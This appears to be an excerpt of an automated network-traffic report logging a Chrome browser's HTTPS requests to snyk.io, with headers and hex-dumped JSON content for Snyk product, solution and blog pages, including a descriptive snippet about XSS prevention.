                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC12INData Raw: 22 6c 69 67 68 74 2d 62 75 6c 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: "light-bul
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 62 22 7d 7d 7d 5d 7d 7d 5d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6c 54 38 32 77 74 6e 4c 6a 50 52 41 30 78 58 44 72 4a 51 4e 66 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 22 2c 22 72 6f 77 73 22 3a 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 52 6f 77 73 43 6f 6c 6c 65 63 74 69 6f 6e 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 31 77 5a 64 63 52 6e 69 66 58 73 38 41 42 36 64 7a 44 4c 50 6b 42 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000b"}}}]}}]}},{"sys":{"id":"lT82wtnLjPRA0xXDrJQNf","__typename":"Sys"},"__typename":"NavigationDropdownMenuColumn","rows":{"__typename":"NavigationDropdownMenuColumnRowsCollection","items":[{"sys":{"id":"1wZdcRnifXs8AB6dzDLPkB","__typename":"Sys"}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC12INData Raw: 5f 5f 74 79 70 65 6e 61 6d 65 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: __typename
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC5587INData Raw: 30 30 30 30 31 35 43 37 0d 0a 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 67 69 74 68 75 62 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 6e 79 6b 2f 22 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 31 77 69 43 32 61 61 54 37 4f 71 71 76 75 35 77 68 64 71 70 62 4b 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 6e 70 6d 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 70 6d 6a 73 2e 63 6f 6d 2f 70 61 63 6b 61 67 65 2f 73 6e 79 6b 22 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 33
                                                                                                                                                                                                                                                                                                              Data Ascii: 000015C7":"ContentNavigationItem","label":"github","url":"https://github.com/snyk/"},{"sys":{"id":"1wiC2aaT7Oqqvu5whdqpbK","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"npm","url":"https://www.npmjs.com/package/snyk"},{"sys":{"id":"3
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC12INData Raw: 30 30 30 30 30 30 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000000


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              74192.168.2.54983623.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC441OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product/snyk-code.json?slug=product&slug=snyk-code HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC631INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"v8nwodklwi3usz"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product/snyk-code.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: STALE
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::iad1::lrqkd-1729799348878-14101324da82
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:08 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799348.109465c
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC15753INData Raw: 30 30 30 30 36 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 36 66 43 6a 63 63 4d 73 30 72 74 48 79 78 38 58 58 6f 34 65 49 72 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 30 2d 32 30 54 31 35 3a 35 37 3a 31 34 2e 30 30 36 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 39 2d 30 36 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"6fCjccMs0rtHyx8XXo4eIr","type":"Entry","createdAt":"2022-10-20T15:57:14.006Z","updatedAt":"2024-09-06T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC8835INData Raw: 6f 76 65 72 76 69 65 77 22 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 62 6f 6c 64 22 7d 5d 2c 22 76 61 6c 75 65 22 3a 22 6c 61 6e 67 75 61 67 65 73 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 68 79 70 65 72 6c 69 6e 6b 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 62 6f 6c 64 22 7d 5d 2c 22 76 61 6c 75 65 22 3a 22 2c c2 a0 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 22 75 72 69 22 3a 22 2f 70 6c 61 74 66 6f 72 6d 2f 69 64 65 2d 70 6c 75 67 69 6e 73 2f 22 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d
                                                                                                                                                                                                                                                                                                              Data Ascii: overview"},"content":[{"data":{},"marks":[{"type":"bold"}],"value":"languages","nodeType":"text"}],"nodeType":"hyperlink"},{"data":{},"marks":[{"type":"bold"}],"value":",","nodeType":"text"},{"data":{"uri":"/platform/ide-plugins/"},"content":[{"data":{}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 32 54 77 43 52 43 6a 6e 65 54 6e 68 63 37 49 54 4a 4d 62 58 61 46 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 30 2d 32 30 54 31 35 3a 35 37 3a 31 34 2e 35 37 30 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 31 31 2d 31 33 54 31 39 3a 33 33 3a 33 37 2e 37 30 35 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 31 32 2c 22 72 65 76 69 73 69 6f 6e 22 3a 33 2c 22 63
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000adzz"}},"id":"2TwCRCjneTnhc7ITJMbXaF","type":"Entry","createdAt":"2022-10-20T15:57:14.570Z","updatedAt":"2023-11-13T19:33:37.705Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":12,"revision":3,"c
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC8204INData Raw: 74 22 3a 22 32 30 32 34 2d 30 37 2d 31 35 54 31 35 3a 34 39 3a 30 37 2e 39 33 31 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 39 34 2c 22 72 65 76 69 73 69 6f 6e 22 3a 31 38 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a 22 6d 6f 6c 65 63 75 6c 65 50 72 69 63 69 6e 67 43 61 72 64 22 7d 7d 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65
                                                                                                                                                                                                                                                                                                              Data Ascii: t":"2024-07-15T15:49:07.931Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":94,"revision":18,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"moleculePricingCard"}},"locale":"en-US"},"fie
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 37 2c 22 72 65 76 69 73 69 6f 6e 22 3a 31 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a 22 73 65 6f 22 7d 7d 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65 6c 64 73 22 3a 7b 22 69 6e 74 65 72 6e 61 6c 4e 61 6d 65 22 3a 22 5c 22 50 72 65 76 65 6e 74 69 6e 67 20 43 72 6f 73 73 2d 53 69 74 65 20 53 63 72 69 70 74 69 6e 67 20 28 58 53 53 29 20 69 6e 20 4a 61 76 61 20 61 70 70 6c 69 63 61 74 69 6f 6e 73 20 77 69 74 68 20 53 6e 79 6b 20 43 6f 64 65 5c 22 20 2d 20 53 45 4f 22 2c
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000ment"}},"publishedVersion":7,"revision":1,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"seo"}},"locale":"en-US"},"fields":{"internalName":"\"Preventing Cross-Site Scripting (XSS) in Java applications with Snyk Code\" - SEO",
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC12INData Raw: 66 20 58 53 53 20 61 74 74 61 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: f XSS atta
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 63 6b 20 63 61 6e 20 62 65 20 70 61 72 74 69 63 75 6c 61 72 6c 79 20 64 61 6e 67 65 72 6f 75 73 20 62 65 63 61 75 73 65 20 69 74 20 63 61 6e 20 61 66 66 65 63 74 20 61 20 6c 61 72 67 65 20 6e 75 6d 62 65 72 20 6f 66 20 75 73 65 72 73 20 61 6e 64 20 6d 61 79 20 70 65 72 73 69 73 74 20 65 76 65 6e 20 61 66 74 65 72 20 74 68 65 20 69 6e 69 74 69 61 6c 20 69 6e 6a 65 63 74 69 6f 6e 20 68 61 73 20 62 65 65 6e 20 66 69 78 65 64 2e 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 70 61 72 61 67 72 61 70 68 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 54 68 65
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000ck can be particularly dangerous because it can affect a large number of users and may persist even after the initial injection has been fixed.","nodeType":"text"}],"nodeType":"paragraph"},{"data":{},"content":[{"data":{},"marks":[],"value":"The
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC12INData Raw: 7d 7d 2c 22 6c 6f 63 61 6c 65 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: }},"locale
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65 6c 64 73 22 3a 7b 22 66 75 6c 6c 4e 61 6d 65 22 3a 22 42 72 69 61 6e 20 56 65 72 6d 65 65 72 22 2c 22 73 6c 75 67 22 3a 22 62 72 69 61 6e 2d 76 65 72 6d 65 65 72 22 2c 22 66 69 72 73 74 4e 61 6d 65 22 3a 22 42 72 69 61 6e 22 2c 22 6c 61 73 74 4e 61 6d 65 22 3a 22 56 65 72 6d 65 65 72 22 2c 22 68 65 61 64 73 68 6f 74 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 3a 2f 2f 72 65 73 2e 63 6c 6f 75 64 69 6e 61 72 79 2e 63 6f 6d 2f 73 6e 79 6b 2f 69 6d 61 67 65 2f 75 70 6c 6f 61 64 2f 76 31 36 37 38 32 38 37 30 36 35 2f 62 72 69 61 6e 2d 76 2e 6a 70 67 22 2c 22 74 61 67 73 22 3a 5b 5d 2c 22 74 79 70 65 22 3a 22 75 70 6c 6f 61 64 22 2c 22 62 79 74 65 73 22 3a 33 39 38 35 33 2c 22 77 69 64
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000":"en-US"},"fields":{"fullName":"Brian Vermeer","slug":"brian-vermeer","firstName":"Brian","lastName":"Vermeer","headshot":[{"url":"http://res.cloudinary.com/snyk/image/upload/v1678287065/brian-v.jpg","tags":[],"type":"upload","bytes":39853,"wid
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC8204INData Raw: 73 20 61 6e 64 20 77 69 6e 20 63 6f 6f 6c 20 73 77 61 67 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 68 65 61 64 69 6e 67 2d 32 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 53 6e 79 6b e2 80 99 73 20 76 75 6c 6e 65 72 61 62 69 6c 69 74 79 20 66 69 78 2d 61 2d 74 68 6f 6e 2c 20 54 68 65 20 42 69 67 20 46 69 78 2c 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 72 75 6e 6e 69 6e 67 20 66 72 6f 6d 20 46 65 62 20 31 34 20 74 6f 20 4d 61 72 20 31 34 2e 20 4a 6f 69 6e 20 74 68 65 20 63 6f 6d 70 65 74 69 74 69 6f 6e 20 61 6e 64 20 66 69 78 20 76 75 6c 6e 65 72 61 62 69 6c 69 74 69 65 73 20
                                                                                                                                                                                                                                                                                                              Data Ascii: s and win cool swag","nodeType":"text"}],"nodeType":"heading-2"},{"data":{},"content":[{"data":{},"marks":[],"value":"Snyks vulnerability fix-a-thon, The Big Fix, is currently running from Feb 14 to Mar 14. Join the competition and fix vulnerabilities


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              75192.168.2.54983523.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC675OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/solutions/secure-ai-generated-code.json?slug=solutions&slug=secure-ai-generated-code HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              purpose: prefetch
                                                                                                                                                                                                                                                                                                              x-nextjs-data: 1
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              x-middleware-prefetch: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC649INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"13pk7o6r0t81bs0"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/solutions/secure-ai-generated-code.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: STALE
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::iad1::dxzrw-1729799348866-50fe3d9b3c95
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:08 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799348.1f60e65
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC15735INData Raw: 30 30 30 30 43 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 32 33 49 4e 53 48 52 39 71 77 6d 38 77 55 48 6e 72 46 75 5a 69 35 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 31 30 2d 31 32 54 31 34 3a 30 33 3a 31 37 2e 32 31 38 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 36 2d 32 34 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 0000C000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"23INSHR9qwm8wUHnrFuZi5","type":"Entry","createdAt":"2023-10-12T14:03:17.218Z","updatedAt":"2024-06-24T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC15943INData Raw: 69 6c 6f 74 20 74 6f 20 71 75 69 63 6b 6c 79 20 77 72 69 74 65 20 63 6f 64 65 2e 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 70 61 72 61 67 72 61 70 68 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 64 6f 63 75 6d 65 6e 74 22 7d 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 74 65 78 74 47 72 69 64 49 74 65 6d 22 3a 7b 7d 7d 7d 7d 2c 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 50
                                                                                                                                                                                                                                                                                                              Data Ascii: ilot to quickly write code.","nodeType":"text"}],"nodeType":"paragraph"}],"nodeType":"document"},"appearance":{"textGridItem":{}}}},{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"P
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC16384INData Raw: 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a 22 6f 72 67 61 6e 69 73 6d 4d 65 64 69 61 43 61 72 64 47 72 69 64 22 7d 7d 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65 6c 64 73 22 3a 7b 22 69 6e 74 65 72 6e 61 6c 4e 61 6d 65 22 3a 22 5c 22 41 64 64 69 74 69 6f 6e 61 6c 20 72 65 73 6f 75 72 63 65 73 5c 22 20 2d 20 6d 65 64 69 61 20 63 61 72 64 20 67 72 69 64 22 2c 22 73 65 63 74 69 6f 6e 49 6e 74 72 6f 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79
                                                                                                                                                                                                                                                                                                              Data Ascii: "type":"Link","linkType":"ContentType","id":"organismMediaCardGrid"}},"locale":"en-US"},"fields":{"internalName":"\"Additional resources\" - media card grid","sectionIntro":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkTy
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC1102INData Raw: 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 32 39 70 31 66 58 48 62 34 76 73 46 7a 64 6d 4c 4f 51 4d 63 4f 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 44 69 73 63 6f 72 64 20 63 68 61 6e 6e 65 6c 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 73 6e 79 6b 2e 63 6f 2f 64 69 73 63 6f 72 64 63 6f 6d 6d 75 6e 69 74 79 22 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 6e 61 76 49 74 65 6d 22 3a 7b 22 69 63 6f 6e 22 3a 22 64 69 73 63 6f 72 64 22 7d 7d 7d 5d 7d 7d 5d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 33 4b 76 57 47 35 58 79 64 6b 7a
                                                                                                                                                                                                                                                                                                              Data Ascii: "sys":{"id":"29p1fXHb4vsFzdmLOQMcO","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"Discord channel","description":null,"url":"https://snyk.co/discordcommunity","appearance":{"navItem":{"icon":"discord"}}}]}}]}},{"sys":{"id":"3KvWG5Xydkz
